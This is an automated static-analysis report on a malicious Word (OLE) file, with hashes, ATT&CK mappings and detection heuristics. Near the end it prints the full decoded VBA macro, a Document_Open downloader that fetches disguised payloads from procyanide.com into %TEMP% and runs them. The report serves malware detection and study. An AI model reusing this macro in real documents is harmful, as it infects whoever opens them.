Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0441a3bc651c0a75…

MALICIOUS

Office (OLE)

92.0 KB Created: 2015-06-25 14:31:00 Authoring application: Microsoft Office Word First seen: 2015-10-13
MD5: ea7d40053089cfee1c702e84317f9ba0 SHA-1: 0a5f64d8f8f5c986ff983a24a42cf403900b33ca SHA-256: 0441a3bc651c0a75e3388c98bb712bd5bacecb82af2b5278cd3695e435736d5e
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros that execute upon opening the document. These macros utilize WScript.Shell to download three files ('document.css', 'gpg.css', 'vault.css') from 'procyanide.com' to the %TEMP% directory and then execute them. This indicates a downloader or dropper functionality, aiming to fetch and run further malicious content.

Heuristics 9

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set x1 = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .write xHttp.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set x1 = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://procyanide.com/document.css� Referenced by macro
    • http://procyanide.com/gpg.cssReferenced by macro
    • http://procyanide.com/vault.cssReferenced by macro
    • http://procyanide.com/document.cssReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1556 bytes
SHA-256: 03fc5a04d6fab18434be0a0e7b50fde3e6d20e788da03b898b0cdbd781cf6eeb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Dim x1
Set x1 = CreateObject("WScript.Shell")
doc = "%TEMP%\\document.doc"
doc = x1.ExpandEnvironmentStrings(doc)
Dim xHttp: Set xHttp = CreateObject("microsoft.xmlhttp")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://procyanide.com/document.css", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile doc, 1
End With
x1.Run doc, 1, 0
Dim x2
Set x2 = CreateObject("WScript.Shell")
vlt = "%TEMP%\\gpg.css"
vlt = x2.ExpandEnvironmentStrings(vlt)
Dim xHttp2: Set xHttp2 = CreateObject("microsoft.xmlhttp")
Dim bStrm2: Set bStrm2 = CreateObject("Adodb.Stream")
xHttp2.Open "GET", "http://procyanide.com/gpg.css", False
xHttp2.Send
With bStrm2
.Type = 1
.Open
.write xHttp2.responseBody
.savetofile vlt, 1
End With
Dim x3
Set x3 = CreateObject("WScript.Shell")
cmd = "%TEMP%\\onuqqa.bat"
cmd = x3.ExpandEnvironmentStrings(cmd)
Dim xHttp3: Set xHttp3 = CreateObject("microsoft.xmlhttp")
Dim bStrm3: Set bStrm3 = CreateObject("Adodb.Stream")
xHttp3.Open "GET", "http://procyanide.com/vault.css", False
xHttp3.Send
With bStrm3
.Type = 1
.Open
.write xHttp3.responseBody
.savetofile cmd, 1
End With
x3.Run cmd, 0, 0
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.